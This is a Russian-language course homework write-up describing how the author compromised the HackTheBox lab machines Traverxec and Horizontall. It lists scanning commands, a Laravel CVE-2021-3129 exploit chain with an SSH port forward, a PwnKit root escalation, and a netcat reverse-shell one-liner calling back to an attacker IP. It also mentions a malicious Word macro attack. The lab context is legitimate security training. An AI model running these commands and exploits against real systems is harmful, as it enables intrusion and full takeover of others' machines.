# CSRn-8_25.05.2022_Network Infrastructure Attacks (Advanced) ДЗ-1. Обязательная часть: Зарегистрируйтесь на платформе HackTheBox, активируйте VIP-аккаунт и получите доступ (возможность выполнять произвольные команды в командной оболочке) к машине Traverxec c правами пользователя. Ссылка на машину: https://app.hackthebox.eu/machines/217 Дополнительная часть: Найдите способ повысить свои права до пользователя root По результатам атаки необходимо подготовить отчет в произвольной форме, описывающий методы, примененные для энумерации и получения доступа. Сканируем хост >nmap -Pn -n -vvv -T4 -sS -sV --version-all -sC -O --open -oA full_scan_traverxec traverxec.htb ![](https://i.imgur.com/ZYWm31y.png) Исследуем веб-сервер >whatweb -a 3 --log-brief=traverxec_whatweb.log http://traverxec.htb ![](https://i.imgur.com/WIhXMko.png) Находим эксплойт для nostromo 1.9.6 ![](https://i.imgur.com/eqLgXNA.png) Скачиваем и запускаем эксплойт который дает реверсшел. Можем удаленно выполнять команды ![](https://i.imgur.com/anD4tIi.png) --- ## DZ-2: Обязательная часть 1. Повысить привилегии на машине Horizontall до root через проброс порта через SSH-туннель и эксплуатацию RCE-уязвимости в Laravel. 2. Реализовать атаку с использованием вредоносного макроса при помощи модуля MSF exploit/multi/fileformat/office_word_macro. Дополнительная часть Получить доступ к удаленному рабочему столу в Endgame Xen с помощью фишинговой атаки(аналогично примеру с занятия), найти способ запустить meterpreter (или иной postexploitation framework) и повысить свои права до NT AUTHORITY\SYSTEM. >python3 50239.py http://api-prod.horizontall.htb ![](https://i.imgur.com/reLINEJ.png) на PayloadsAllTheThings берем нагрузку для интерактивного реверсшела Netcat BusyBox https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox ![](https://i.imgur.com/s0YZycz.png) предварительно открываем порт >nc -nlvp 1234 и загружаем полезную нагрузку > rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f ![](https://i.imgur.com/5D1WtL1.png) получаем соединение на предварительно открытый порт ![](https://i.imgur.com/S0UlB0q.png) LinPEAS подсветил CVE-2021-4034 Передав через http север exploit получаем повышение привилегий до root ![](https://i.imgur.com/nn9lvZh.png) Второй способ повышения привелегий >curl http://localhost:8000 ![](https://i.imgur.com/vEK46bf.png) через уязвимость в фреймворке Laravel v8. Так как http сервер работает на localhost:8000 необходимо пробросить этот порт на kali. Пробрасывать порт будем штатными средствами ssh. Так как соединение по ssh c horizontall на kali на 22 порт фильтруется, то сервер ssh на kali поднимем на порту 2222. ![](https://i.imgur.com/izghXE6.png) На horizontal включаем Remote TCP forwarding >ssh -R 9999:localhost:8000 10.10.14.6 -p 2222 На kali запускаем Exploit for CVE-2021-3129 на localhost:9999. >php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id > ./laravel-ignition-rce.py http://localhost:9999/ /tmp/exploit.phar 2. Реализовать атаку с использованием вредоносного макроса при помощи модуля MSF exploit/multi/fileformat/office_word_macro. ![](https://i.imgur.com/Pa95s1i.png) ![](https://i.imgur.com/B0GVAFR.png)